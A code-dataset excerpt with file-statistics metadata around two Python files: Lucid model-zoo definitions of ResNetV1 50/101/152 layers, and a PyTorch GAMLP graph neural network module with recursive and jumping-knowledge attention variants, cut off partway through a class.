| 47.711409 | 143 | 0.417133 | 3,337 | 35,545 | 4.417441 | 0.107282 | 0.079235 | 0.023879 | 0.014924 | 0.901703 | 0.881758 | 0.862221 | 0.858965 | 0.856116 | 0.856116 | 0 | 0.087026 | 0.42231 | 35,545 | 744 | 144 | 47.775538 | 0.630856 | 0.011141 | 0 | 0.869932 | 0 | 0 | 0.377383 | 0.006198 | 0 | 0 | 0 | 0 | 0 | 1 | 0.011824 | false | 0 | 0.001689 | 0 | 0.025338 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
30c5f7a7bf79b5a65896b51c37b8e34068da1a2c | 13,158 | py | Python | lucid/modelzoo/slim_models/ResNetV1.py | gabgoh/lucid | 643844807a41ac3bd9b972cdfb0a3f793c9c2d11 | [
"Apache-2.0"
] | 18 | 2019-02-04T20:57:37.000Z | 2021-03-30T17:05:21.000Z | lucid/modelzoo/slim_models/ResNetV1.py | gabgoh/lucid | 643844807a41ac3bd9b972cdfb0a3f793c9c2d11 | [
"Apache-2.0"
] | 2 | 2021-09-19T06:54:17.000Z | 2022-01-23T02:49:06.000Z | lucid/modelzoo/slim_models/ResNetV1.py | gabgoh/lucid | 643844807a41ac3bd9b972cdfb0a3f793c9c2d11 | [
"Apache-2.0"
] | 16 | 2019-02-11T22:05:23.000Z | 2021-09-19T06:53:42.000Z | # Copyright 2018 The Lucid Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import, division, print_function
from lucid.modelzoo.vision_base import Model, _layers_from_list_of_dicts, IMAGENET_MEAN
class ResnetV1_50_slim(Model):
"""ResnetV150 as implemented by the TensorFlow slim framework.
This function provides the pre-trained reimplementation from TF slim:
https://github.com/tensorflow/models/tree/master/research/slim
"""
model_path = 'gs://modelzoo/vision/slim_models/ResnetV1_50.pb'
labels_path = 'gs://modelzoo/labels/ImageNet_standard.txt'
synsets_path = 'gs://modelzoo/labels/ImageNet_standard_with_dummy_synsets.txt'
dataset = 'ImageNet'
image_shape = [224, 224, 3]
image_value_range = (-117, 255-117) # Inferred by testing, may not be exactly right
input_name = 'input'
# In ResNetV1, each add (joining the residual branch) is followed by a Relu
# this seems to be the natural "layer" position
ResnetV1_50_slim.layers = _layers_from_list_of_dicts(ResnetV1_50_slim, [
{'tags': ['conv'], 'name': 'resnet_v1_50/conv1/Relu', 'depth': 64},
{'tags': ['conv'], 'name': 'resnet_v1_50/block1/unit_1/bottleneck_v1/Relu', 'depth': 256},
{'tags': ['conv'], 'name': 'resnet_v1_50/block1/unit_2/bottleneck_v1/Relu', 'depth': 256},
{'tags': ['conv'], 'name': 'resnet_v1_50/block1/unit_3/bottleneck_v1/Relu', 'depth': 256},
{'tags': ['conv'], 'name': 'resnet_v1_50/block2/unit_1/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_50/block2/unit_2/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_50/block2/unit_3/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_50/block2/unit_4/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_50/block3/unit_1/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_50/block3/unit_2/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_50/block3/unit_3/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_50/block3/unit_4/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_50/block3/unit_5/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_50/block3/unit_6/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_50/block4/unit_1/bottleneck_v1/Relu', 'depth': 2048},
{'tags': ['conv'], 'name': 'resnet_v1_50/block4/unit_2/bottleneck_v1/Relu', 'depth': 2048},
{'tags': ['conv'], 'name': 'resnet_v1_50/block4/unit_3/bottleneck_v1/Relu', 'depth': 2048},
{'tags': ['dense'], 'name': 'resnet_v1_50/predictions/Softmax', 'depth': 1000},
])
class ResnetV1_101_slim(Model):
"""ResnetV1101 as implemented by the TensorFlow slim framework.
This function provides the pre-trained reimplementation from TF slim:
https://github.com/tensorflow/models/tree/master/research/slim
"""
model_path = 'gs://modelzoo/vision/slim_models/ResnetV1_101.pb'
labels_path = 'gs://modelzoo/labels/ImageNet_standard.txt'
synsets_path = 'gs://modelzoo/labels/ImageNet_standard_with_dummy_synsets.txt'
dataset = 'ImageNet'
image_shape = [224, 224, 3]
image_value_range = (-117, 255-117) # Inferred by testing, may not be exactly right
input_name = 'input'
# In ResNetV1, each add (joining the residual branch) is followed by a Relu
# this seems to be the natural "layer" position
ResnetV1_101_slim.layers = _layers_from_list_of_dicts(ResnetV1_101_slim, [
{'tags': ['conv'], 'name': 'resnet_v1_101/conv1/Relu', 'depth': 64},
{'tags': ['conv'], 'name': 'resnet_v1_101/block1/unit_1/bottleneck_v1/Relu', 'depth': 256},
{'tags': ['conv'], 'name': 'resnet_v1_101/block1/unit_2/bottleneck_v1/Relu', 'depth': 256},
{'tags': ['conv'], 'name': 'resnet_v1_101/block1/unit_3/bottleneck_v1/Relu', 'depth': 256},
{'tags': ['conv'], 'name': 'resnet_v1_101/block2/unit_1/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_101/block2/unit_2/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_101/block2/unit_3/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_101/block2/unit_4/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_1/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_2/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_3/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_4/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_5/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_6/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_7/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_8/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_9/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_10/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_11/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_12/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_13/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_14/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_15/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_16/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_17/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_18/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_19/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_20/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_21/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_22/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_23/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block4/unit_1/bottleneck_v1/Relu', 'depth': 2048},
{'tags': ['conv'], 'name': 'resnet_v1_101/block4/unit_2/bottleneck_v1/Relu', 'depth': 2048},
{'tags': ['conv'], 'name': 'resnet_v1_101/block4/unit_3/bottleneck_v1/Relu', 'depth': 2048},
{'tags': ['dense'], 'name': 'resnet_v1_101/predictions/Softmax', 'depth': 1000},
])
class ResnetV1_152_slim(Model):
"""ResnetV1152 as implemented by the TensorFlow slim framework.
This function provides the pre-trained reimplementation from TF slim:
https://github.com/tensorflow/models/tree/master/research/slim
"""
model_path = 'gs://modelzoo/vision/slim_models/ResnetV1_152.pb'
labels_path = 'gs://modelzoo/labels/ImageNet_standard.txt'
synsets_path = 'gs://modelzoo/labels/ImageNet_standard_with_dummy_synsets.txt'
dataset = 'ImageNet'
image_shape = [224, 224, 3]
image_value_range = (-117, 255-117) # Inferred by testing, may not be exactly right
input_name = 'input'
# In ResNetV1, each add (joining the residual branch) is followed by a Relu
# this seems to be the natural "layer" position
ResnetV1_152_slim.layers = _layers_from_list_of_dicts(ResnetV1_152_slim, [
{'tags': ['conv'], 'name': 'resnet_v1_152/conv1/Relu', 'depth': 64},
{'tags': ['conv'], 'name': 'resnet_v1_152/block1/unit_1/bottleneck_v1/Relu', 'depth': 256},
{'tags': ['conv'], 'name': 'resnet_v1_152/block1/unit_2/bottleneck_v1/Relu', 'depth': 256},
{'tags': ['conv'], 'name': 'resnet_v1_152/block1/unit_3/bottleneck_v1/Relu', 'depth': 256},
{'tags': ['conv'], 'name': 'resnet_v1_152/block2/unit_1/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_152/block2/unit_2/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_152/block2/unit_3/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_152/block2/unit_4/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_152/block2/unit_5/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_152/block2/unit_6/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_152/block2/unit_7/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_152/block2/unit_8/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_1/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_2/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_3/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_4/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_5/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_6/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_7/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_8/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_9/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_10/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_11/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_12/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_13/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_14/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_15/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_16/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_17/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_18/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_19/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_20/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_21/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_22/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_23/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_24/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_25/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_26/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_27/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_28/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_29/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_30/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_31/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_32/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_33/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_34/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_35/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_36/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block4/unit_1/bottleneck_v1/Relu', 'depth': 2048},
{'tags': ['conv'], 'name': 'resnet_v1_152/block4/unit_2/bottleneck_v1/Relu', 'depth': 2048},
{'tags': ['conv'], 'name': 'resnet_v1_152/block4/unit_3/bottleneck_v1/Relu', 'depth': 2048},
{'tags': ['dense'], 'name': 'resnet_v1_152/predictions/Softmax', 'depth': 1000},
])
| 69.619048 | 95 | 0.682931 | 1,916 | 13,158 | 4.431106 | 0.102296 | 0.123675 | 0.14841 | 0.216254 | 0.91437 | 0.911896 | 0.89258 | 0.89258 | 0.877856 | 0.865135 | 0 | 0.104997 | 0.098115 | 13,158 | 188 | 96 | 69.989362 | 0.610432 | 0.132087 | 0 | 0.153285 | 0 | 0 | 0.61852 | 0.457706 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.014599 | 0 | 0.189781 | 0.007299 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
30d14313750eac8434f0d784124c9f707cc9d7fc | 26,016 | py | Python | GAMLP/model.py | ytchx1999/MAXP_DGL_Graph | 01ea0dc3e6f957b8c7a9b6958df02559f1866b32 | [
"MIT"
] | 21 | 2021-12-23T14:03:41.000Z | 2022-03-24T06:47:05.000Z | GAMLP/model.py | ytchx1999/MAXP_DGL_Graph | 01ea0dc3e6f957b8c7a9b6958df02559f1866b32 | [
"MIT"
] | null | null | null | GAMLP/model.py | ytchx1999/MAXP_DGL_Graph | 01ea0dc3e6f957b8c7a9b6958df02559f1866b32 | [
"MIT"
] | 6 | 2022-01-14T05:27:13.000Z | 2022-01-19T12:59:16.000Z | import dgl.function as fn
import torch.nn.functional as F
import torch.nn as nn
import torch
from layer import *
class R_GAMLP(nn.Module): # recursive GAMLP
def __init__(self, nfeat, hidden, nclass, num_hops,
dropout, input_drop, att_dropout, alpha, n_layers_1, n_layers_2, act="relu", pre_process=False, residual=False, pre_dropout=False, bns=False, fine_tune=None):
super(R_GAMLP, self).__init__()
self.num_hops = num_hops
self.prelu = nn.PReLU()
if pre_process:
self.lr_att = nn.Linear(hidden + hidden, 1)
self.lr_output = FeedForwardNetII(
hidden, hidden, nclass, n_layers_2, dropout, alpha, bns)
self.process = nn.ModuleList(
[FeedForwardNet(nfeat, hidden, hidden, 2, dropout, bns) for i in range(num_hops)])
else:
self.lr_att = nn.Linear(nfeat + nfeat, 1)
self.lr_output = FeedForwardNetII(
nfeat, hidden, nclass, n_layers_2, dropout, alpha, bns)
self.dropout = nn.Dropout(dropout)
self.input_drop = nn.Dropout(input_drop)
self.att_drop = nn.Dropout(att_dropout)
self.pre_process = pre_process
self.res_fc = nn.Linear(nfeat, hidden)
self.residual = residual
self.pre_dropout = pre_dropout
if act == 'sigmoid':
self.act = torch.nn.Sigmoid()
elif act == 'relu':
self.act = torch.nn.ReLU()
elif act == 'leaky_relu':
self.act = torch.nn.LeakyReLU(0.2)
self.reset_parameters()
if fine_tune != None:
for param in self.prelu.parameters():
param.requires_grad = False
for param in self.lr_att.parameters():
param.requires_grad = False
for param in self.process.parameters():
param.requires_grad = False
for param in self.res_fc.parameters():
param.requires_grad = False
def reset_parameters(self):
gain = nn.init.calculate_gain("relu")
nn.init.xavier_uniform_(self.lr_att.weight, gain=gain)
nn.init.zeros_(self.lr_att.bias)
nn.init.xavier_uniform_(self.res_fc.weight, gain=gain)
nn.init.zeros_(self.res_fc.bias)
self.lr_output.reset_parameters()
if self.pre_process:
for layer in self.process:
layer.reset_parameters()
def forward(self, feature_list):
num_node = feature_list[0].shape[0]
feature_list = [self.input_drop(feature) for feature in feature_list]
input_list = []
if self.pre_process:
for i in range(self.num_hops):
input_list.append(self.process[i](feature_list[i]))
else:
input_list = feature_list
attention_scores = []
attention_scores.append(self.act(self.lr_att(
torch.cat([input_list[0], input_list[0]], dim=1))))
for i in range(1, self.num_hops):
history_att = torch.cat(attention_scores[:i], dim=1)
att = F.softmax(history_att, 1)
history = torch.mul(input_list[0], self.att_drop(
att[:, 0].view(num_node, 1)))
for j in range(1, i):
history = history + \
torch.mul(input_list[j], self.att_drop(
att[:, j].view(num_node, 1)))
attention_scores.append(self.act(self.lr_att(
torch.cat([history, input_list[i]], dim=1))))
attention_scores = torch.cat(attention_scores, dim=1)
attention_scores = F.softmax(attention_scores, 1)
right_1 = torch.mul(input_list[0], self.att_drop(
attention_scores[:, 0].view(num_node, 1)))
for i in range(1, self.num_hops):
right_1 = right_1 + \
torch.mul(input_list[i], self.att_drop(
attention_scores[:, i].view(num_node, 1)))
if self.residual:
right_1 += self.res_fc(feature_list[0])
right_1 = self.dropout(self.prelu(right_1))
if self.pre_dropout:
right_1 = self.dropout(right_1)
right_1 = self.lr_output(right_1)
return right_1
class JK_GAMLP(nn.Module):
def __init__(self, nfeat, hidden, nclass, num_hops,
dropout, input_drop, att_dropout, alpha, n_layers_1, n_layers_2, act, pre_process=False, residual=False, pre_dropout=False, bns=False):
super(JK_GAMLP, self).__init__()
self.num_hops = num_hops
self.prelu = nn.PReLU()
self.pre_dropout = pre_dropout
if pre_process:
self.lr_jk_ref = FeedForwardNetII(
num_hops*hidden, hidden, hidden, n_layers_1, dropout, alpha, bns)
self.lr_att = nn.Linear(hidden + hidden, 1)
self.lr_output = FeedForwardNetII(
hidden, hidden, nclass, n_layers_2, dropout, alpha, bns)
self.process = nn.ModuleList(
[FeedForwardNet(nfeat, hidden, hidden, 2, dropout, bns) for i in range(num_hops)])
else:
self.lr_jk_ref = FeedForwardNetII(
num_hops*nfeat, hidden, hidden, n_layers_1, dropout, alpha, bns)
self.lr_att = nn.Linear(nfeat + hidden, 1)
self.lr_output = FeedForwardNetII(
nfeat, hidden, nclass, n_layers_2, dropout, alpha, bns)
self.dropout = nn.Dropout(dropout)
self.input_drop = nn.Dropout(input_drop)
self.att_drop = nn.Dropout(att_dropout)
self.pre_process = pre_process
self.res_fc = nn.Linear(nfeat, hidden)
if act == 'sigmoid':
self.act = torch.nn.Sigmoid()
elif act == 'relu':
self.act = torch.nn.ReLU()
elif act == 'leaky_relu':
self.act = torch.nn.LeakyReLU(0.2)
self.residual = residual
self.reset_parameters()
def reset_parameters(self):
gain = nn.init.calculate_gain("relu")
nn.init.xavier_uniform_(self.lr_att.weight, gain=gain)
nn.init.zeros_(self.lr_att.bias)
nn.init.xavier_uniform_(self.res_fc.weight, gain=gain)
nn.init.zeros_(self.res_fc.bias)
self.lr_output.reset_parameters()
self.lr_jk_ref.reset_parameters()
if self.pre_process:
for layer in self.process:
layer.reset_parameters()
def forward(self, feature_list):
num_node = feature_list[0].shape[0]
feature_list = [self.input_drop(feature) for feature in feature_list]
input_list = []
if self.pre_process:
for i in range(len(feature_list)):
input_list.append(self.process[i](feature_list[i]))
else:
input_list = feature_list
concat_features = torch.cat(input_list, dim=1)
jk_ref = self.dropout(self.prelu(self.lr_jk_ref(concat_features)))
attention_scores = [self.act(self.lr_att(torch.cat((jk_ref, x), dim=1))).view(num_node, 1) for x in
input_list]
W = torch.cat(attention_scores, dim=1)
W = F.softmax(W, 1)
right_1 = torch.mul(input_list[0], self.att_drop(
W[:, 0].view(num_node, 1)))
for i in range(1, self.num_hops):
right_1 = right_1 + \
torch.mul(input_list[i], self.att_drop(
W[:, i].view(num_node, 1)))
if self.residual:
right_1 += self.res_fc(feature_list[0])
right_1 = self.dropout(self.prelu(right_1))
if self.pre_dropout:
right_1 = self.dropout(right_1)
right_1 = self.lr_output(right_1)
return right_1
class JK_GAMLP_RLU(nn.Module):
def __init__(self, nfeat, hidden, nclass, num_hops,
dropout, input_drop, att_dropout, label_drop, alpha, n_layers_1, n_layers_2, n_layers_3, act, pre_process=False, residual=False, pre_dropout=False, bns=False):
super(JK_GAMLP_RLU, self).__init__()
self.num_hops = num_hops
self.pre_dropout = pre_dropout
self.prelu = nn.PReLU()
self.res_fc = nn.Linear(nfeat, hidden, bias=False)
if pre_process:
self.lr_jk_ref = FeedForwardNetII(
num_hops*hidden, hidden, hidden, n_layers_1, dropout, alpha, bns)
self.lr_att = nn.Linear(hidden + hidden, 1)
self.lr_output = FeedForwardNetII(
hidden, hidden, nclass, n_layers_2, dropout, alpha, bns)
self.process = nn.ModuleList(
[FeedForwardNet(nfeat, hidden, hidden, 2, dropout, bns) for i in range(num_hops)])
else:
self.lr_jk_ref = FeedForwardNetII(
num_hops*nfeat, hidden, hidden, n_layers_1, dropout, alpha, bns)
self.lr_att = nn.Linear(nfeat + hidden, 1)
self.lr_output = FeedForwardNetII(
nfeat, hidden, nclass, n_layers_2, dropout, alpha, bns)
self.dropout = nn.Dropout(dropout)
self.input_drop = nn.Dropout(input_drop)
self.att_drop = nn.Dropout(att_dropout)
self.label_drop = nn.Dropout(label_drop)
self.pre_process = pre_process
self.label_fc = FeedForwardNet(
nclass, hidden, nclass, n_layers_3, dropout)
if act == 'sigmoid':
self.act = torch.nn.Sigmoid()
elif act == 'relu':
self.act = torch.nn.ReLU()
elif act == 'leaky_relu':
self.act = torch.nn.LeakyReLU(0.2)
self.residual = residual
def reset_parameters(self):
gain = nn.init.calculate_gain("relu")
nn.init.xavier_uniform_(self.lr_att.weight, gain=gain)
nn.init.zeros_(self.lr_att.bias)
nn.init.xavier_uniform_(self.res_fc.weight, gain=gain)
nn.init.zeros_(self.res_fc.bias)
self.lr_output.reset_parameters()
self.lr_jk_ref.reset_parameters()
if self.pre_process:
for layer in self.process:
layer.reset_parameters()
def forward(self, feature_list, label_emb):
num_node = feature_list[0].shape[0]
feature_list = [self.input_drop(feature) for feature in feature_list]
input_list = []
if self.pre_process:
for i in range(len(feature_list)):
input_list.append(self.process[i](feature_list[i]))
concat_features = torch.cat(input_list, dim=1)
jk_ref = self.dropout(self.prelu(self.lr_jk_ref(concat_features)))
attention_scores = [self.act(self.lr_att(torch.cat((jk_ref, x), dim=1))).view(num_node, 1) for x in
input_list]
W = torch.cat(attention_scores, dim=1)
W = F.softmax(W, 1)
right_1 = torch.mul(input_list[0], self.att_drop(
W[:, 0].view(num_node, 1)))
for i in range(1, self.num_hops):
right_1 = right_1 + \
torch.mul(input_list[i], self.att_drop(
W[:, i].view(num_node, 1)))
if self.residual:
right_1 += self.res_fc(feature_list[0])
right_1 = self.dropout(self.prelu(right_1))
if self.pre_dropout:
right_1 = self.dropout(right_1)
right_1 = self.lr_output(right_1)
right_1 += self.label_fc(self.label_drop(label_emb))
return right_1
class R_GAMLP_RLU(nn.Module): # recursive GAMLP
def __init__(self, nfeat, hidden, nclass, num_hops,
dropout, input_drop, att_dropout, label_drop, alpha, n_layers_1, n_layers_2, n_layers_3, act, pre_process=False, residual=False, pre_dropout=False, bns=False):
super(R_GAMLP_RLU, self).__init__()
self.num_hops = num_hops
self.pre_dropout = pre_dropout
self.prelu = nn.PReLU()
if pre_process:
self.lr_att = nn.Linear(hidden + hidden, 1)
self.lr_output = FeedForwardNetII(
hidden, hidden, nclass, n_layers_2, dropout, alpha, bns)
self.process = nn.ModuleList(
[FeedForwardNet(nfeat, hidden, hidden, 2, dropout, bns) for i in range(num_hops)])
else:
self.lr_att = nn.Linear(nfeat + nfeat, 1)
self.lr_output = FeedForwardNetII(
nfeat, hidden, nclass, n_layers_2, dropout, alpha, bns)
self.dropout = nn.Dropout(dropout)
self.input_drop = nn.Dropout(input_drop)
self.att_drop = nn.Dropout(att_dropout)
self.pre_process = pre_process
self.res_fc = nn.Linear(nfeat, hidden)
self.label_drop = nn.Dropout(label_drop)
self.residual = residual
self.label_fc = FeedForwardNet(
nclass, hidden, nclass, n_layers_3, dropout)
if act == 'sigmoid':
self.act = torch.nn.Sigmoid()
elif act == 'relu':
self.act = torch.nn.ReLU()
elif act == 'leaky_relu':
self.act = torch.nn.LeakyReLU(0.2)
self.reset_parameters()
def reset_parameters(self):
gain = nn.init.calculate_gain("relu")
nn.init.xavier_uniform_(self.lr_att.weight, gain=gain)
nn.init.zeros_(self.lr_att.bias)
nn.init.xavier_uniform_(self.res_fc.weight, gain=gain)
nn.init.zeros_(self.res_fc.bias)
self.lr_output.reset_parameters()
if self.pre_process:
for layer in self.process:
layer.reset_parameters()
def forward(self, feature_list, label_emb):
num_node = feature_list[0].shape[0]
feature_list = [self.input_drop(feature) for feature in feature_list]
input_list = []
if self.pre_process:
for i in range(self.num_hops):
input_list.append(self.process[i](feature_list[i]))
else:
input_list = feature_list
attention_scores = []
attention_scores.append(self.act(self.lr_att(
torch.cat([input_list[0], input_list[0]], dim=1))))
for i in range(1, self.num_hops):
history_att = torch.cat(attention_scores[:i], dim=1)
att = F.softmax(history_att, 1)
history = torch.mul(input_list[0], self.att_drop(
att[:, 0].view(num_node, 1)))
for j in range(1, i):
history = history + \
torch.mul(input_list[j], self.att_drop(
att[:, j].view(num_node, 1)))
attention_scores.append(self.act(self.lr_att(
torch.cat([history, input_list[i]], dim=1))))
attention_scores = torch.cat(attention_scores, dim=1)
attention_scores = F.softmax(attention_scores, 1)
right_1 = torch.mul(input_list[0], self.att_drop(
attention_scores[:, 0].view(num_node, 1)))
for i in range(1, self.num_hops):
right_1 = right_1 + \
torch.mul(input_list[i], self.att_drop(
attention_scores[:, i].view(num_node, 1)))
if self.residual:
right_1 += self.res_fc(feature_list[0])
right_1 = self.dropout(self.prelu(right_1))
if self.pre_dropout:
right_1 = self.dropout(right_1)
right_1 = self.lr_output(right_1)
right_1 += self.label_fc(self.label_drop(label_emb))
return right_1
# adapt from https://github.com/facebookresearch/NARS/blob/main/model.py
class WeightedAggregator(nn.Module):
def __init__(self, num_feats, in_feats, num_hops):
super(WeightedAggregator, self).__init__()
self.agg_feats = nn.ParameterList()
for _ in range(num_hops):
self.agg_feats.append(nn.Parameter(
torch.Tensor(num_feats, in_feats)))
nn.init.xavier_uniform_(self.agg_feats[-1])
def forward(self, feat_list): # feat_list k (N,S,D)
new_feats = []
